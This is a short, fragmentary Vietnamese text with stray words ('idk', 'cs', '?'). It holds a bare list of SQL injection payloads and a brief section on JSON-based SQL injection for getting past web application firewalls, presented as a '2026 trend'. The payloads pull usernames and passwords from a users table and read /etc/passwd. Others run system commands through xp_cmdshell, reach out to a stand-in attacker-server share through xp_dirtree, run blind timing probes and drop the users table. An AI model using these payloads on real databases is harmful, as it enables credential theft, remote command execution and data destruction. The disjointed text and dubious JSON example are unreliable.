idk

thêm SQLi để phá giấc mơ xấu nhé
' UNION SELECT username, password FROM users--

' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--

'; DECLARE @q VARCHAR(8000); SELECT @q = 0x73656c...;EXEC @q;--

'; EXEC xp_dirtree '\\attacker-server\share';--

' IF (SELECT ASCII(SUBSTRING(username,1,1)) FROM users WHERE id=1) > 97 WAITFOR DELAY '0:0:5'--

' AND (SELECT ASCII(SUBSTRING(username,1,1)) FROM users WHERE id=1) > 97--

' UNION SELECT LOAD_FILE('/etc/passwd')--

'; EXEC xp_cmdshell 'whoami';--

ORDER BY (SELECT password FROM users WHERE username='admin')--

'; DROP TABLE users;--

7️⃣ SQL Injection hiện đại: Xu hướng mới 2026

JSON-Based SQL Injection

Với sự phổ biến của NoSQL và các tính năng JSON trong các RDBMS hiện đại (PostgreSQL, MySQL 8+, SQL Server), xuất hiện các kỹ thuật tấn công mới lạm dụng chức năng JSON để bypass WAF.

Ví dụ, thay vì:

' OR 1=1--

Kẻ tấn công có thể sử dụng:

'->>'$.{"test":"x"="x"}--

cs

?